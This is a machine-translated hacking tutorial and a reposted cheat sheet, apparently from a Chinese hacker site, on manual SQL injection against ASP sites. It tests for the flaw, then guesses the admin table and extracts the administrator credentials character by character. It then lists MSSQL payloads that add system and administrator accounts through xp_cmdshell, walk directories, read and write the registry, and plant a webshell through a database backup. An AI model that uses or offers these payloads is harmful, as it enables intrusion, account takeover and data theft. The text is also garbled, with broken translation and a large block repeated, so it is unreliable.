SQL Injection Analysis (manual injection detection) and manual injection script command excellent Edition The intrusion process includes the following steps: 1. test whether the ASP system has an injection vulnerability; 2. Obtain the database table name; 3. Test Management. Employee ID; 4. Test the administrator username length and administrator password length; 5. Test the administrator username and password in sequence from high to low. It is critical to test whether the ASP system has an injection vulnerability. If there is no vulnerability in the website, don't be so busy. The method is also very simple. Open ASP Station A classification web page, such as stealing handsome Download System/list. asp? Id = 11./class. asp? Id = 18, followed Add and 1 = 1 and 1 = 2 respectively for testing. The specific form is /List. asp? Id = 11 and 1 = 1 (the following test statements are added in the same format, tty will not explain) Note the space. In IE, spaces are automatically converted to % 20. If the input and 1 = 1 can display the original page content normally, enter And 1 = 2 cannot display the content of the original page normally, it indicates that the SQL injection vulnerability exists. You can perform the following steps. Test Database Table Name a database usually contains many tables. We need to find the table that stores the administrator username and password. For known For the type of ASP system, you can download a compressed package on the Internet, and use the auxiliary Minister database browser to open the database to view it. All are admin. Whether you know the table name or not, use the following statement to test it: And 0 <> (select count (*) from Admin) If the normal page is returned, the table name is admin; otherwise, the test is continued .; Test administrator ID. Generally, there are not many website administrators, and the IDs are not very large. They are tested with 1, 2, 3, and so on. The test statement is as follows: And (select count (*) from Admin where id = 1) Change the last number 1 until the original page is returned. It is important to test the Administrator's username length and administrator password length. If you do not know that the username and password are under several digits, you cannot . Username length: and (select count (*) from Admin where id = 5 and Len (username) = 4) Password Length: and (select count (*) from Admin where id = 5 and Len (PWS) = 4) Note that the username field for storing the username and The PWS field for storing the password in the table need to open the database for confirmation. Finally, the administrator username and password are tested from high to low, one by one, until the test is completed: Testing the username's third letter: and (select count (*) from Admin where id = 5 and left (Username, 3) = 'ttd ') Testing the 7th-bit password: and (select count (*) from Admin where id = 5 and left (PWS, 7) = '123 ') Well, if the operation is correct, you can test the correct user name and password. Go to the Internet and find a hacker to download the system. Exercise the system or Yifeng website system! For beginners, the above method can be regarded as learning the injection principle. The actual operation is very tiring, not to mention whether the statement is Correct and proficient, the user name and password can be used to test every digit. If the number is used for 10 times, for example If a letter is required for testing 26 times, if any old user name and password are used! @ # $ %, Let's test it slowly, haha ! ------------------------------------- Manual injection script command excellent Edition Author: Unknown Source: cnxhacker. net 1. Determine whether injection exists; and 1 = 1; and 1 = 2 2. Determine whether it is MSSQL. and user> 0 3. The injection parameter is the character 'and [query condition] And ''=' 4. The 'and [query condition] And' % 25' = 'parameters are not filtered during search' 5. Determine the Database System ; And (select count (*) from sysobjects)> 0 MSSQL ; And (select count (*) from msysobjects)> 0 access 6. Guess the database; and (select count (*) from [database name])> 0 7. Guess the field; and (select count (field name) from database name)> 0 1. Determine whether injection exists; and 1 = 1; and 1 = 2 2. Determine whether it is MSSQL. and user> 0 3. The injection parameter is the character 'and [query condition] And ''=' 4. The 'and [query condition] And' % 25' = 'parameters are not filtered during search' 5. Determine the Database System ; And (select count (*) from sysobjects)> 0 MSSQL ; And (select count (*) from msysobjects)> 0 access 6. Guess the database; and (select count (*) from [database name])> 0 7. Guess the field; and (select count (field name) from database name)> 0 8. Length of records in the guess field; and (select top 1 Len (field name) from database name)> 0 9. (1) obtain the ASCII value of a field (ACCESS) ; And (select top 1 ASC (mid (field name, 1, 1) from database name)> 0 (2) Guess the ASCII value of a field (MSSQL) ; And (select top 1 Unicode (substring (field name, 1, 1) from database name)> 0 10. Test the permission structure (MSSQL) ; And 1 = (select is_srvrolemember ('sysadmin '));-- ; And 1 = (select is_srvrolemember ('serveradmin '));-- ; And 1 = (select is_srvrolemember ('setupadmin '));-- ; And 1 = (select is_srvrolemember ('securityadmin '));-- ; And 1 = (select is_srvrolemember ('diskadmin '));-- ; And 1 = (select is_srvrolemember ('bulkadmin '));-- ; And 1 = (select is_member ('db _ owner '));-- 11. add MSSQL and system accounts ; Exec master. DBO. sp_addlogin username ;-- ; Exec master. DBO. sp_password null, username, password ;-- ; Exec master. DBO. SP_ADDSRVROLEMEMBER SysAdmin username ;-- ; Exec master. DBO. xp_mongoshell 'net User Username Password /Workstations: */times: All/passwordchg: yes/passwordreq: yes/active: yes/add ';-- ; Exec master. DBO. xp_mongoshell 'net User Username Password/add ';-- ; Exec master. DBO. xp_mongoshell 'net localgroup administrators username/add ';-- 12. (1) traverse the directory ; Create Table dirs (paths varchar (100), Id INT) ; Insert dirs exec master. DBO. xp_dirtree 'C :/' ; And (select top 1 paths from dirs)> 0 ; And (select top 1 paths from dirs where paths not in ('obtained paths ')>) (2) traverse directories ; Create Table temp (ID nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));-- ; Insert temp exec master. DBO. xp_availablemedia; -- get all current drives ; Insert into temp (ID) exec master. DBO. xp_subdirs 'C:/'; -- get the subdirectory list ; Insert into temp (ID, num1) exec master. DBO. xp_dirtree 'C:/'; -- get the directory tree structure of all subdirectories ; Insert into temp (ID) exec master. DBO. xp_mongoshell 'Type C:/web/index. asp '; -- view the file Capacity 13. MSSQL Stored Procedures Xp_regenumvalues registry Root Key, subkey ; Exec xp_regenumvalues 'HKEY _ LOCAL_MACHINE ',' Software/Microsoft/Windows/CurrentVersion/run' returns all key values in the form of multiple Record Sets Xp_regread Root Key, subkey, key value name ; Exec xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion', 'commonfilesdir' Specify the key value Xp_regwrite Root Key, subkey, Value Name, value type, Value There are two value types: REG_SZ and REG_DWORD. ; Exec xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion ',' Testvaluename ', 'reg _ SZ', 'Hello' write to the Registry Xp_regdeletevalue Root Key, subkey, Value Name Exec xp_regdeletevalue 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion' , 'Testvaluename' deletes a value. Xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/CurrentVersion/testkey 'Delete key, including all values under this key 14. MSSQL backup creates webshell Use Model Create Table cmd (STR image ); Insert into cmd (STR) values (''); Backup database model to disk = 'C:/L. asp '; 15. MSSQL built-in functions ; And (select @ version)> 0 to get the Windows version number ; And user_name () = 'dbo' determine whether the user connected to the current system is sa ; And (select user_name ()> 0 blow the user connected to the current system ; And (select db_name ()> 0 to get the database currently connected 16. Simple webshell Use Model Create Table cmd (STR image ); Insert into cmd (STR) values (''); Backup database model to disk = 'G:/wwwtest/L. asp '; 8. Length of records in the guess field; and (select top 1 Len (field name) from database name)> 0 9. (1) obtain the ASCII value of a field (ACCESS) ; And (select top 1 ASC (mid (field name, 1, 1) from database name)> 0 (2) Guess the ASCII value of a field (MSSQL) ; And (select top 1 Unicode (substring (field name, 1, 1) from database name)> 0 10. Test the permission structure (MSSQL) ; And 1 = (select is_srvrolemember ('sysadmin '));-- ; And 1 = (select is_srvrolemember ('serveradmin '));-- ; And 1 = (select is_srvrolemember ('setupadmin '));-- ; And 1 = (select is_srvrolemember ('securityadmin '));-- ; And 1 = (select is_srvrolemember ('diskadmin '));-- ; And 1 = (select is_srvrolemember ('bulkadmin '));-- ; And 1 = (select is_member ('db _ owner '));-- 11. add MSSQL and system accounts ; Exec master. DBO. sp_addlogin username ;-- ; Exec master. DBO. sp_password null, username, password ;-- ; Exec master. DBO. SP_ADDSRVROLEMEMBER SysAdmin username ;-- ; Exec master. DBO. xp_mongoshell 'net User Username Password /Workstations: */times: All/passwordchg: yes/passwordreq: yes/active: yes/add ';-- ; Exec master. DBO. xp_mongoshell 'net User Username Password/add ';-- ; Exec master. DBO. xp_mongoshell 'net localgroup administrators username/add ';-- 12. (1) traverse the directory ; Create Table dirs (paths varchar (100), Id INT) ; Insert dirs exec master. DBO. xp_dirtree 'C :/' ; And (select top 1 paths from dirs)> 0 ; And (select top 1 paths from dirs where paths not in ('obtained paths ')>) (2) traverse directories ; Create Table temp (ID nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));-- ; Insert temp exec master. DBO. xp_availablemedia; -- get all current drives ; Insert into temp (ID) exec master. DBO. xp_subdirs 'C:/'; -- get the subdirectory list ; Insert into temp (ID, num1) exec master. DBO. xp_dirtree 'C:/'; -- get the directory tree structure of all subdirectories ; Insert into temp (ID) exec master. DBO. xp_mongoshell 'Type C:/web/index. asp '; -- view the file Capacity 13. MSSQL Stored Procedures Xp_regenumvalues registry Root Key, subkey ; Exec xp_regenumvalues 'HKEY _ LOCAL_MACHINE ',' Software/Microsoft/Windows/CurrentVersion/run' returns all key values in the form of multiple Record Sets Xp_regread Root Key, subkey, key value name ; Exec xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion', 'commonfilesdir' Specify the key value Xp_regwrite Root Key, subkey, Value Name, value type, Value There are two value types: REG_SZ and REG_DWORD. ; Exec xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion ',' Testvaluename ', 'reg _ SZ', 'Hello' write to the Registry Xp_regdeletevalue Root Key, subkey, Value Name Exec xp_regdeletevalue 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/currentversion' , 'Testvaluename' deletes a value. Xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows/CurrentVersion/testkey 'Delete key, including all values under this key 14. MSSQL backup creates webshell Use Model Create Table cmd (STR image ); Insert into cmd (STR) values (''); Backup database model to disk = 'C:/L. asp '; 15. MSSQL built-in functions ; And (select @ version)> 0 to get the Windows version number ; And user_name () = 'dbo' determine whether the user connected to the current system is sa ; And (select user_name ()> 0 blow the user connected to the current system ; And (select db_name ()> 0 to get the database currently connected 16. Simple webshell Use Model Create Table cmd (STR image ); Insert into cmd (STR) values (''); Backup database model to disk = 'G:/wwwtest/L. asp '; |